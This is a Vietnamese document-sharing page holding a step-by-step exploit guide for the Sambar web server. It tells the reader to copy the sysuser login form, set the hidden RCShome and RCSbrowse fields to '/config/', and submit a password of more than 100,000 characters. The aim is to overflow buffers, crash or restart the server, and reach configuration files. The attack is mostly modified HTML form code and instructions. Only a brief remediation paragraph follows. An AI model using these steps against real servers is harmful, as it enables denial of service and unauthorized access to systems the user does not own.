Lỗi tràn bộ đệm của Server Sambar

Chia sẻ: ™——† Lvlr. DK †——™ »»» V.I.P ««« | Ngày: | Loại File: PDF | Số trang:2

Thêm vào BST

Báo xấu

108
lượt xem 21
download

Download Vui lòng tải xuống để xem tài liệu đầy đủ

Lỗi tràn bộ đệm của Server Sambar : CÁCH KHAI THÁC: Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser: BƯỚC 1: đi tới đường dẫn của form đăng nhập sysuser, như http://localhost/sysuser/index.stm. BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename thành something.html . BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho form và images , tất nhiên, form phải được connect đến đúng địa chỉ url của script server. CODE [FORM METHOD=POST...

Chủ đề:

Bình luận(0) Đăng nhập để gửi bình luận!

Lưu

Nội dung Text: Lỗi tràn bộ đệm của Server Sambar

Lỗi tràn bộ đệm của Server Sambar : CÁCH KHAI THÁC: Bạn phải biết được đường dẫn (ở sambar là c:\sambar ) của form đăng nhập sysuser: BƯỚC 1: đ i tới đường dẫn của form đăng nhập sysuser, như http://localhost/sysuser/index.stm. BƯỚC 2: copy và paste đoạn mã của form đăng nhập (toàn bộ) lên 1 trang khác và rename thành something.html . BƯỚC 3: đặt vào đúng chỗ http://localhost/ hoặc url cho server sambar của bạn ,cái này cho form và images , tất nhiên, form phải được connect đến đúng đ ịa chỉ url của script server. CODE [FORM METHOD=POST ACTION="http://localhost/session/login" onsubmit="return FormValidator(this)"] [INPUT TYPE=hidden NAME="RCpage" VALUE="http://localhost/sysuser/desktop.stm"]*This is your desktop installation. [INPUT TYPE=hidden NAME="onfailure" VALUE="http://localhost/sysuser/relogin.stm"]*bạn có thể thay đổi cái này để làm tăng việc tràn bộ đệm giống như một script cgi (cái này có thể là tấn công bằng DoS) [INPUT TYPE=hidden NAME="start" VALUE=1> [INPUT TYPE=hidden NAME="RCSdesktop" VALUE="true"] [INPUT TYPE=hidden NAME="RCSsort" VALUE="desc"] [INPUT TYPE=hidden NAME="RCSstyle" VALUE="txtconvert"] [INPUT TYPE=hidden NAME="RCSwrap" VALUE="60"] [INPUT TYPE=hidden NAME="RCScount" VALUE="25] [INPUT TYPE=hidden NAME="RCSfolder" VALUE="inbox"] [INPUT TYPE=hidden NAME="RCSpath" VALUE="/] [INPUT TYPE=hidden NAME="RCShome" VALUE="/config/] *Đây là vấn đề* [INPUT TYPE=hidden NAME="RCSbrowse" VALUE="/config/"]*Đây là vấn đề* [INPUT TYPE=hidden NAME="RCSsortby" VALUE="name] BƯỚC 4: bây giờ bạn có thể refresh và login, dùng một user và password hợp lệ nếu bạn muốn chứng tỏ một lỗi nữa ở bước 6! BƯỚC 5: bây bạn phải nhấn submit, chờ, và nếu bạn chạy server trên máy của bạn thì server se trở nên dễ bị đ ổ, nếu bạn tiếp tục send thì server phải restart hoặc máy của bạn restart trong suốt quá trình tấn công!. BƯỚC 6: lỗi thứ hai là trà n bộ đệm ở vùng mật khẩu, bạn có thể chèn vào hơn 1 triệu ký tự và submit nó nhưng phải edit đoạn mã này trên máy của bạn: CODE [INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="" MAXLENGTH=40]< thay đổi cái này thành... [INPUT TYPE=PASSWORD NAME="RCpwd" VALUE="đặt text của bạn ở đây, nhớ là hơn 100000
ký tự"] và.......... BƯỚC 7: nhấn submit và server... ! GIẢI PHÁP: - Thay đổi đường dẫn và thư mục của file liên quan đến user ở server sambar! - Những ngư ời phát triển server sambar có thể thay đ ổi code va p hát triển một module để kiểm tra việc đi lại các file của user và bộ đệm của form transfer ở chế độ POST hay GET.